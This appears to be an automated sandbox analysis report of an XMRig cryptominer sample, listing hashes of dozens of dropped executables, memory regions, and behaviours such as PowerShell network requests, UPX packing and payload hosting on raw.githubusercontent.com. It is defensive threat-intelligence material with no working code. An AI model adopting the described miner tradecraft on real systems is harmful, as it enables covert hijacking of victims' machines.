SHA512 d9ad4fccb1379d259cd2646952c3257145bbf1ce4b33ebacd7412d88a42811161bb5a506692670a08fcf6b34dec17ddd0bf4c999678cd30e9a3900c808d1da3f

\Windows\system\DCThHdf.exe

MD5 2a5134276c80e11040b62729e6d3029d
SHA1 2ffffa351c163173d90be0b26856ad5fa06b6fd8
SHA256 1283c7515586979b30153dab3d7b97dbba64d2ba36cda8b3e9aeb91a7711b076
SHA512 7dcbaee3bf8fcab50ef4b02167e0b30359efcbba2eabc2a5f6fdd3dc29b3847723ff6ae91e60f445c1d670d749b73414fd3d835b69c88eb77bd14546162fdd6e

memory/2188-20-0x00000000031E0000-0x00000000035D6000-memory.dmp

C:\Windows\system\etfSnTw.exe

MD5 7b952a196d72d69a93f0a691081499a8
SHA1 932e0257619b3ccaf29bd4b7d65504b9ad40d623
SHA256 58ce6a879f57d3907e98c2db47654a0d4ce10e05cd034f576b8a47dab2a74a63
SHA512 a11cd0084f628b96a7443153eb1c3cfd5906cf14970487ce6127aff36f8c1d37513efcfcb2055c6d4955bcae3728da7231eb243750e4dc1fe34f4dc7d8714cb7

memory/2188-10-0x00000000031E0000-0x00000000035D6000-memory.dmp

memory/2144-24-0x000000013FA70000-0x000000013FE66000-memory.dmp

memory/1188-42-0x0000000002E60000-0x0000000002EE0000-memory.dmp

\Windows\system\BTGboBp.exe

MD5 26c0bd41e609d09701c210850640e47a
SHA1 59fbf6d3b813d145c028c11ecc8a14368f575a00
SHA256 8a501892abf0b0d79f55d914d0ceab291894037b65d7680f057feeb6a1d49550
SHA512 c507494be784813f67432b5fe548f04d7496d83158ea0a3aea6657353396f93685dd4174fbc43474f9fe933abd37148b33f5a0a6dc73280eedf71ed01e620b50

memory/2188-44-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/2188-41-0x000000013FC50000-0x0000000140046000-memory.dmp

memory/2288-40-0x000000013FE00000-0x00000001401F6000-memory.dmp

memory/2740-39-0x000000013FC50000-0x0000000140046000-memory.dmp

memory/2188-37-0x000000013FE00000-0x00000001401F6000-memory.dmp

memory/1188-45-0x000000001B880000-0x000000001BB62000-memory.dmp

memory/3056-35-0x000000013F320000-0x000000013F716000-memory.dmp

C:\Windows\system\nkeDzLC.exe

MD5 5147e09814698903ebe1047e82c5f87f
SHA1 d6cd2d8af3fbbd39919e8b636b0a5d4427743cf4
SHA256 2994f76178e9d00db19ef4c9f11e103938e9147fcab39ce7cf9545cd30b09efb
SHA512 3704d7622ac111d1137aaa008b49ee25109bf4dc0cf87b5d6cb56af148f2b425428a18fb49ebc1761186fb74d35c2b435825397af0e831094f043aa488574535

memory/2188-32-0x00000000031E0000-0x00000000035D6000-memory.dmp

C:\Windows\system\ZwhwJvD.exe

MD5 4f02af088c417beeeadb6f93aae81aac
SHA1 930e89702f52c59167173bd2d1eb1364c26aec2d
SHA256 b85ca3e292fd47c4158e78730d31cb97bc41053e7ce9afe546ff480f756ba5bd
SHA512 7420eafa11038d744591e73acacc4e65e6bdb272ad386835a133d114fc9c8db778ca20ec9fab846663adba193651b90d4f5377f3c03addb1c7f097e1c6f3174a

C:\Windows\system\kTVcvFM.exe

MD5 24863f7b46f5f99fd59b768a64ef84a7
SHA1 d10a02956634dead5b70d56d290ce88c054791e2
SHA256 c7e2074055587e25f52f5ea913f47b53adc1fd1d133ed75e4d7d3fd045748f10
SHA512 8f713659f80789f8101e2def65f5c6ae5c10584578a056d8de3dc876045995656f937cca16d2f9c0bcdf81f178c24ff707a0fd038e89f0971b641ad17f71d82b

memory/2188-78-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/2188-88-0x000000013F700000-0x000000013FAF6000-memory.dmp

C:\Windows\system\BPOpgtL.exe

MD5 03eafcc0d1de25e218b28aa834dd5a02
SHA1 dae69e5d77504e7366f174b03ab39bdb3e102149
SHA256 8cdacb8af153ce1b5230bcfd51aed39477b349ebebc97267a53a4f72bc5b3d2b
SHA512 bd48f9a3e78a0ae55370e5388b21fcfd492bf7aab94ce8243690057ed1c7f93fe3da8bfa95442887ba6c4299574072928ba11e76bf4ad7936d2e583c4bdb4e3d

C:\Windows\system\JXIjGBn.exe

MD5 503844a0dc6a29b551f75c22089b03a9
SHA1 4fdcc8c5c200ee2f2135d072fb6269d16e2b063c
SHA256 bb4b7723a2f7b44e15028c25cd1f3c90880b538008673ba66cacc12d78838748
SHA512 8613d538088c3d9a003a1fb6ee515453539dd31e27e4393ec6fb30abb9e6359364fe8acd3b60e3dc2522ee2246f11c2c21a84b2074f64926696ae38bd328bcbf

memory/1188-560-0x0000000002E60000-0x0000000002EE0000-memory.dmp

memory/2188-561-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/2188-73-0x0000000003680000-0x0000000003A76000-memory.dmp

\Windows\system\PhPkQly.exe

MD5 031c2b27a7ab15bf3ff4b3459a48cef1
SHA1 db9c38a06aebfc9ae1a4ba3c8287cd4d7f2da02d
SHA256 cd73808d084ff03e94b94430a4fc1a3cc91bfaef6143b813b54bb183b2a2837a
SHA512 2a75c6dac07ca6994846def08fedfb1f3375f6776a451a7bac6dcaadb50d5b59a1d943fd37e32354bd381b1e5d267916189e552e37d2e2e19502ce07b330136d

C:\Windows\system\pDGldCQ.exe

MD5 311a3e6babd62294c05dfb6742a9e6e7
SHA1 c271d469b46ed5a56f876e433eabb4355f461e25
SHA256 abc5c59c97d769f7897cce29bd8eeb19cafc4611c0493d66b8a96be1312f99ae
SHA512 3819586e980c3c837f118e028de55ebe0783cb0ac284fa6feb8bd3995480b0d141fe469a1de1afa2904118e6ed2782f7889f2cfdb57a568aa910093b42e6c281

C:\Windows\system\VuIrImT.exe

MD5 2f23552f3c93d8cc2022393fe24cac71
SHA1 43e746bb0f1b25f85f3cb4fa9cb46302b07092fb
SHA256 01a5f8faaee1e6a61fbbecfdc52c5194ef048ee45bd7555881da94baef02e0d1
SHA512 374cc4a453d934ad88cb73d80e4e0eac1fe15dfdea2e4b541b155dbf6d8734a2b746f208df3be15b95c07552d9f1dd277186383c412daa9c7778822cdb7ba192

C:\Windows\system\mbsBuCR.exe

MD5 08fac176353c60cf0f0c24ac55fc719a
SHA1 b486109eb5d9265b6e810bd00411082600a77d30
SHA256 ba0b115f82c0e166b9c03625a4d91ad5c9d91671990458467074001964fdd7e8
SHA512 4d8bf36b40850ce9857c05cb70084ce16a28673b5a7502dc1e2375d4d13378348df1ee69c3407e7627e4f96306c686925090cc5615aa906f08b175c4409e558f

C:\Windows\system\jcVeyxI.exe

MD5 6c269d16e95ed056f4e4bbdbb5bdb8f6
SHA1 9ab11c79f0a6374741a8ff83eb932f1981cbc9e2
SHA256 aeaabdb82ea8017aba1909f9dd984e206f1884642e1a18fe3381226ca058535b
SHA512 903b0bc3399489707be591e08412b35107ed95fbbc646d3d9b6cbc631a3b04cc9bfea3266070f7f16c4e2c79f829549787990e55e18dbd22a9a3d9a4726b77e6

C:\Windows\system\UgQNLyc.exe

MD5 42ffc08c50356f98fc84dff2a07f9132
SHA1 979eb50e71e86c9ca51f8e64ab96029ba0be64b5
SHA256 a7adff8a2c80b7130d8aa50a2542ac186bd1251c514f58439ad3eed6cacd65c4
SHA512 bc86bd60e54877278847d814d523d44ff95615875c4110b456c7194b0ed32113f6034750523e24d60859b4b42206d861730eb7b90ab2da48634486e5bcbfacaf

C:\Windows\system\zohhpte.exe

MD5 6ac9b35f9fae697a11e44c1278f7d77e
SHA1 a7ff120d8548a2dbd476a075dfbfa0f058d97db0
SHA256 442c03a6878b3c7841133592d2a0bdfe4193d98d6e605d0716801e2b9b2cc9fd
SHA512 c44f44c9cc5c49ee4d40711250f428bec7540713a01b30d83487c1c4c790d264f4160c2fd11f2ac511f4c4307257544ff4bd64469fd6f501f60957af8713fed8

C:\Windows\system\ZEMycPc.exe

MD5 22351322ddfce754fcb88ebc0d3d9e58
SHA1 79e290b50f28327d7afa7bdb531e3a50e5d92f84
SHA256 a5e610e91295e328231bb020e6bd2bb3b8f3338f10c337e7be9e99cb9aed3986
SHA512 94507225f628568a2e57590b0ca983196a349ddd44551fe60469cac9b7a726496dc02dfa4a0888228620d3c728c5a85e18be6567590404e49d1c6a583c6d9c42

C:\Windows\system\zbsIcyP.exe

MD5 c3b3075fc4abf4b09a20a56c67ac1fb2
SHA1 3dcf2271f21a7e5186e1d61f6e309dd287e32acf
SHA256 2eccbc3e770d011b950059d4cebd20a313ca4324c08903a146bc289138f75726
SHA512 323672d896db77d91799dd6bd7091228a36f8e6a9ade38bc6e7a78784201fd2fd51c768902e87dd2de3d9d0fea8fefbf21da47aa1a1b0a9887ad7d2df2ab139a

C:\Windows\system\FEMMcVA.exe

MD5 b794c080d9aa214f2a521e3a7e28dc45
SHA1 22220f056a2edbdf1671870473c284e502a2a459
SHA256 e468b46636d564e59d773fcb7541851790d9347c7ab03a87aa0ed939d40f4f10
SHA512 758b52904f314fc580ff90b68084540053584ae664be675e58f7961645c87fd533648042fd98e8a6e7852238d33aa70764a20262ec757d7c4db5ac4ee3ba0fbd

C:\Windows\system\rdLXkiL.exe

MD5 706bc095932bae3fec7facfce7067f80
SHA1 c83d871629b2309870b29088dd2b41bf3de97961
SHA256 a3f5188e993181ebbd6832d3c610287189d85960598f82b30b553a1e0f008631
SHA512 88151bdca90cec5daf66186ded2f7c52a5c8086fbf85c3c5428890b9fcad42e3e5ad6cf5e2ffbb7e405fa6c43a695863b744d2e46a125af99c3900891b47a3f9

C:\Windows\system\YmLlxCv.exe

MD5 24db533c528e7598d76869fe3a4fa9c2
SHA1 52f046896a1f436ec4575b49bbdd924d35516444
SHA256 750ed58ea430830efbb25be50f797d71e82a47f8f2ef1506bd10329869cc3242
SHA512 6b94766b9d4a866ad6c492715515a77ff0a5dc53654f6367c3aca21f014f7b06c5a421b44ccead6bcbb1c4b017a0df889681fd2bbd38a5c9b153edc5061164b4

C:\Windows\system\uLmFIOZ.exe

MD5 1f0892fa4bd7eda8eb9b3bcdaa6c2b17
SHA1 aa9004497daae2a5ad5903a30b020a9e92348d3c
SHA256 b19fada0dd74efec5d46dcde33d57f9948a8d306668a0818cd2faa8f67aeb771
SHA512 01d1a776d7cf82148fab04bc6694c0c30bcbe1d841815e735e449cf6a5e84c3ef4e348e53436de90e6a538730cc11ee580b5abf69ae59ca38c87e2952dbb5972

C:\Windows\system\pBiaQkw.exe

MD5 c4cd57ee73c6c1d72c55a48d01550beb
SHA1 67746a281103796154063f514d7627fc600c3ce7
SHA256 e8bf102754dcfd58f84dd16594db5b9ecc56d55a35d28efd5d2321e2a9eaf4eb
SHA512 e715c355b384959b981d827a2ebf2f0498212796b04caf4ad49cbefe5fbe5545fdd19bfb07050d401bfedbde07368c6707c5e08a2de3494b329e9276b5fff2f1

memory/2464-80-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/2188-79-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/1884-77-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2956-71-0x000000013FB00000-0x000000013FEF6000-memory.dmp

memory/2188-62-0x0000000003680000-0x0000000003A76000-memory.dmp

\Windows\system\LKzgEHS.exe

MD5 6b4ef43d12ebe721079ae3e9f150b41c
SHA1 d9695328cd1c05ccc27f50ef658f2bac065ebf5e
SHA256 f2aa29242d807f124b19a2dd7dbe0c3575038ffc9bf9bb2d735e1b54bd550fea
SHA512 0adc8eceb6d13d48b5ad8a0447c87761ad8d3a675632662368e7ff1f9a41cfbf2fc75edc46b8ed5dc0359c37ee0e6b6046e922aa6f44c75d8b2120dd1efe3395

memory/2464-18-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

C:\Windows\system\PpkXHcF.exe

MD5 6bf692e505f4ac7570fa9725a14c8da0
SHA1 624772d970b6a5232b18d6da70cf482055ef6701
SHA256 e6f1e77973c8ef52cf77c30dff3d1c030cda9f67665104ebdfa9b43a262f3380
SHA512 19b7feb2b585de2b25fdda3eddb365607a93c74e6123f77fe29a77c4f0ac1e2a9f8a840733510065806af3ea522a5d7662c0babf7d4d35f4297ba6b533792954

memory/2952-90-0x000000013F510000-0x000000013F906000-memory.dmp

\Windows\system\muCNCDE.exe

MD5 83ce2fe70afc517013233f0d481a6d2c
SHA1 39169d718bf1cc9c5b2dbc56c4e3d5bf04659271
SHA256 f0ca3330d56ef6ea1ce6f04504e950f8f6fe298517464fd7a6773660f90bdc19
SHA512 0e6e0310c4e7660bf29ab82dc7fc7745a1c9a6e2aa8de89d1efc698a65715232de868b37a392e6346faa2bcbde2f0b867595c065a617dffa755bcf545ca3b081

\Windows\system\bMzZEQn.exe

MD5 4ef7d6d653d1398c6156962f325f471f
SHA1 31b301b7998a40167ba66d7812d816d1de1b2af1
SHA256 5367920a951bae1ca27e8064152de09257a0622a94e832f227be6ef09bc8b188
SHA512 ae39c48369830ee74fa85cd6d3a8b69bc6005846af392101326cdfa27e35c521a2a8db6fe142a6c48ee5bff857e3c1904ff842c7e4527d67d4c1e13df31163c7

\Windows\system\SJJGYLn.exe

MD5 5880f8782b5a7db10e305a72f289f19b
SHA1 d0f46726e1067878e9263fc4be7eb4968958a27b
SHA256 cc7ca80239ea45e5eaf70d25175be6c73e60c768539306a4c0f2c58b5bbcc84a
SHA512 8df031b27c7d70d141e99af75bcbb37476750b34e5886136b61e44287352d469d7be3892f004ed477d25a129874a2db3eee3a0b3e85c485d914b156b0955960a

memory/2188-92-0x000000013F1E0000-0x000000013F5D6000-memory.dmp

C:\Windows\system\EYOmzPi.exe

MD5 2830936c6aabf5015ab6d5a68209dc66
SHA1 adfcd4e67ffe0e6e551c64f6322f43a3783801ee
SHA256 36f72aa06fb3efd60af6d0e08d3ec6f518c718e44208e852c5f50b53dc31b3b1
SHA512 2b621b3a8be24d30ceaf31e8bf4e90c0d79dc5f8b6f80989ecca4b447917b66f834055f0e4b52b030fc75e90e816a6ce2b3953749bc428e450f9891bc048c997

\Windows\system\tGNzPVu.exe

MD5 b257684d0fcf6b650651b13e18c6fbba
SHA1 19b75d4afe7e4090cc22684461ebdf91114c97ff
SHA256 42cc4657667dd391722e5488814493eb674541449d54e402fbf117957c1c8c1d
SHA512 b3c02c222096f6c3a99e3f0bf7abc2c9bd4edbbfeae485316e166c8b24bc9e81f686956843194a0276efb26f27c76a6b7ebc2bbe876606b0b8b03e38deacc5a8

memory/2188-55-0x000000013F140000-0x000000013F536000-memory.dmp

memory/2496-58-0x000000013F140000-0x000000013F536000-memory.dmp

memory/1188-49-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

memory/2188-91-0x00000000031E0000-0x00000000035D6000-memory.dmp

\Windows\system\vciNTTy.exe

MD5 dfe489dbfc9d482922816feabc08311b
SHA1 3fde62ed648ea2cbd4fd4e0388d3724422c80b25
SHA256 544c79a2a33c2335f95bc5247b7cf8d96e1b11fa034c37541fca714a77e64ef5
SHA512 89171350401c37772cf2fe6d5713a8b2acc2bef09e5a95454e73475e89003e2ea658876efc441321a8fd71a5c9e933b633bc2a272e4f9218a1b68b33e638d5a2

\Windows\system\VrgYfda.exe

MD5 55a33802c6d2f923c38650b8e0de61ec
SHA1 0c2bde771595bb42b487359ba4b2cd997f2c6f89
SHA256 ee88b2483dc2ca88d074fed0d15b9f8b1f04fdd79875aac45404fc005f5b8028
SHA512 3d1f1d1967711f9275515262b3f71f8423b71380eeb27bb4c824ffaa4bdec80ec4e486c46b7f930578e15e888c0e0e89fd4e08fe160b698fac4a671d4eec9ad3

\Windows\system\MUpOUrb.exe

MD5 118b9fb3904fb673b3d33787572dcc47
SHA1 08d8ae4fb288545b672739f13636560302006578
SHA256 2641246d6c0edf99757c6622536f8e2340f007433beffd0a4fd9287449e0bb75
SHA512 c827d4f7e12b2397ecc3647a1d6aea28a1bd4578546603b5276666eeb9b01742c0a3f447c44701e48b06e447eec68fb60200fe7af3fd829b06b4da7edf40649c

\Windows\system\ecGchOy.exe

MD5 c6a296dfa8b5b3d909e3d7b2f2375187
SHA1 c885af3a46ca7e4e59d3758b0e4a3d95173c6cec
SHA256 46e15cba7261ba81243b1eb6243fdf01cd7c6ea9b95d60de8555471e2e4f6a6e
SHA512 c182992b5ffde72178338bf020c00d889b8aa4e3cf2e79a98c5b46b0244ce004169c19e5db431c2dbc8f142e7857b5277cd21f4f9cb1f677d6ddbc2d53e1e812

\Windows\system\FEZZCsz.exe

MD5 d9dc45fe226ab673b698959cda19e729
SHA1 0675aabe22267ac608e63dcd2f056308a8103650
SHA256 67175ad903f92ad40d69dca858e3edce57d527dff5da6ec8a34bd919ccd4514e
SHA512 a35cead777c1502f53940366163d1df19978d86ef2e4bf3744efd5bf817945b782c6af7723836a580a821cf0b1f90550a59b3d1f3e78f0c9edd13587d2160d5a

\Windows\system\bCxQDbq.exe

MD5 7218fb70e82fd0ef9019197403b3000d
SHA1 227a5b5d12789dea5e41a1a4175f3ed6248c0552
SHA256 5a78b03694f90febaf7905621f4f4a44ad886eee9e2c38fb86addd8602d0846d
SHA512 4d0fe42317221d10c182ec14941a66c9c16fe0525088cf04bd823080475696dbc86ef8fe3dfca69a498840cc4bd3fb3a181a5325314a544cb63df0abd759f74b

\Windows\system\vdMBADI.exe

MD5 923c32bfc06ca6b89117bbc738e77163
SHA1 14a02dcd66f1d4e97a3c2d6901f36929c82a7fca
SHA256 f6916fea70864734bdbf74ad9a71e725882f9a48ee89d812fad568c9c68b3316
SHA512 156b0d5b034b41706f30b037bf3e58abb38d81685bd0a9214359597fc0eddfbc0bcd0f9f8f4474be0383682ad838305cb3028c19e5a487b759be0bde470252ab

\Windows\system\CuMLtNF.exe

MD5 36242ef795fdd7b0698b9628acda5fdd
SHA1 bdbca9fcc9c219b9a2653cd3231869c08cca5918
SHA256 42a941d7d517d336395fa4fda46f31032273404d0965a01f877afaacc0b0895e
SHA512 562eec6a91dfc4b30180ad5aa7f5cab64fe050c08b4e85cd4f3721a3a2fd17a2035b032a56dc8d5ed72de164a92064a6826e27e656d3b69ccf5907c8d7fbefe0

\Windows\system\tJGmrrO.exe

MD5 8ad52c56e844665978e0230e6acf09cc
SHA1 d8177ac499f8c9b389c7db84bab46b39c77bc0ef
SHA256 40978f230992d9e4d7a4bed5ca58623d26d526336afe8ed5404afc480414ed55
SHA512 ee15a6c721c07e1c8f2d09f5e918de79e51d366755dca67350830848f5c57d8e211a711551cab750bd7355980c3a9278ed209c98a2c66c8eadd2985626e7aa2f

memory/2188-836-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/2656-835-0x000000013F9A0000-0x000000013FD96000-memory.dmp

memory/2956-1713-0x000000013FB00000-0x000000013FEF6000-memory.dmp

memory/2496-1710-0x000000013F140000-0x000000013F536000-memory.dmp

memory/2188-2249-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/1884-2254-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2188-2776-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/2188-2775-0x0000000003680000-0x0000000003A76000-memory.dmp

memory/2188-3253-0x000000013F1E0000-0x000000013F5D6000-memory.dmp

memory/2740-4517-0x000000013FC50000-0x0000000140046000-memory.dmp

memory/2144-4521-0x000000013FA70000-0x000000013FE66000-memory.dmp

memory/1884-4662-0x000000013FD20000-0x0000000140116000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 17:25

Reported

2024-05-27 17:28

Platform

win10v2004-20240426-en

Max time kernel

145s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\kqIywdL.exe N/A
N/A N/A C:\Windows\System\EaDLXWl.exe N/A
N/A N/A C:\Windows\System\gBlqcjd.exe N/A
N/A N/A C:\Windows\System\HekKzBK.exe N/A
N/A N/A C:\Windows\System\xbEfEGV.exe N/A
N/A N/A C:\Windows\System\GsrwRjJ.exe N/A
N/A N/A C:\Windows\System\NknEBlk.exe N/A
N/A N/A C:\Windows\System\kdMVKux.exe N/A
N/A N/A C:\Windows\System\SeyGcKy.exe N/A
N/A N/A C:\Windows\System\iimELuQ.exe N/A
N/A N/A C:\Windows\System\dvtpCUI.exe N/A
N/A N/A C:\Windows\System\LRcUohG.exe N/A
N/A N/A C:\Windows\System\tfiEkEl.exe N/A
N/A N/A C:\Windows\System\EXJQkpL.exe N/A
N/A N/A C:\Windows\System\iAfGyJn.exe N/A
N/A N/A C:\Windows\System\fxwkvyg.exe N/A
N/A N/A C:\Windows\System\KKdxzOR.exe N/A
N/A N/A C:\Windows\System\VhVDBAp.exe N/A
N/A N/A C:\Windows\System\MHjAzkY.exe N/A
N/A N/A C:\Windows\System\lpsaZkr.exe N/A
N/A N/A C:\Windows\System\iXdSatG.exe N/A
N/A N/A C:\Windows\System\ljLrXiy.exe N/A
N/A N/A C:\Windows\System\ymWqDEA.exe N/A
N/A N/A C:\Windows\System\iLMcBQX.exe N/A
N/A N/A C:\Windows\System\jDUEVYt.exe N/A
N/A N/A C:\Windows\System\YBDLdAk.exe N/A
N/A N/A C:\Windows\System\PogDzva.exe N/A
N/A N/A C:\Windows\System\fzGBTwh.exe N/A
N/A N/A C:\Windows\System\SaCJqpD.exe N/A
N/A N/A C:\Windows\System\vqSOgPu.exe N/A
N/A N/A C:\Windows\System\gFHjYzr.exe N/A
N/A N/A C:\Windows\System\byuocGA.exe N/A
N/A N/A C:\Windows\System\ivViWCN.exe N/A
N/A N/A C:\Windows\System\JekaSyT.exe N/A
N/A N/A C:\Windows\System\bZFkWZA.exe N/A
N/A N/A C:\Windows\System\NBvXxYp.exe N/A
N/A N/A C:\Windows\System\Mjjlpit.exe N/A
N/A N/A C:\Windows\System\lOZqQGH.exe N/A
N/A N/A C:\Windows\System\dbuhaAs.exe N/A
N/A N/A C:\Windows\System\vApkSEX.exe N/A
N/A N/A C:\Windows\System\JijaHxx.exe N/A
N/A N/A C:\Windows\System\IoDaEEN.exe N/A
N/A N/A C:\Windows\System\HTRCcby.exe N/A
N/A N/A C:\Windows\System\BiUWJwS.exe N/A
N/A N/A C:\Windows\System\jBBNUfs.exe N/A
N/A N/A C:\Windows\System\CApBdtf.exe N/A
N/A N/A C:\Windows\System\WDcaqXZ.exe N/A
N/A N/A C:\Windows\System\SlXYvBd.exe N/A
N/A N/A C:\Windows\System\iubNmIB.exe N/A
N/A N/A C:\Windows\System\LxEAHhi.exe N/A
N/A N/A C:\Windows\System\NUepteb.exe N/A
N/A N/A C:\Windows\System\XyWEJIB.exe N/A
N/A N/A C:\Windows\System\MDivcSS.exe N/A
N/A N/A C:\Windows\System\TAmxfCW.exe N/A
N/A N/A C:\Windows\System\jVgTHAM.exe N/A
N/A N/A C:\Windows\System\PrHWdQz.exe N/A
N/A N/A C:\Windows\System\WVgOFlF.exe N/A
N/A N/A C:\Windows\System\Embnhqj.exe N/A
N/A N/A C:\Windows\System\KPnpYba.exe N/A
N/A N/A C:\Windows\System\kmLFmiC.exe N/A
N/A N/A C:\Windows\System\ZZHMbmJ.exe N/A
N/A N/A C:\Windows\System\XaakBtS.exe N/A
N/A N/A C:\Windows\System\fkGSIiO.exe N/A
N/A N/A C:\Windows\System\BTPeRXx.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\cUohAtp.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\FftWDYn.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\NxwQpKR.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\bcAGvjc.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\TIjmPPl.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\aIPiziv.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\loHhuNN.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\BGUvtMA.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\jYYvWnA.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\qNVmatK.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ocTdPJA.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\tEnOdaU.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ktmevuO.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\XMSgPzR.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\NKARxjC.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\GEVgxiG.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\GINUgSR.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
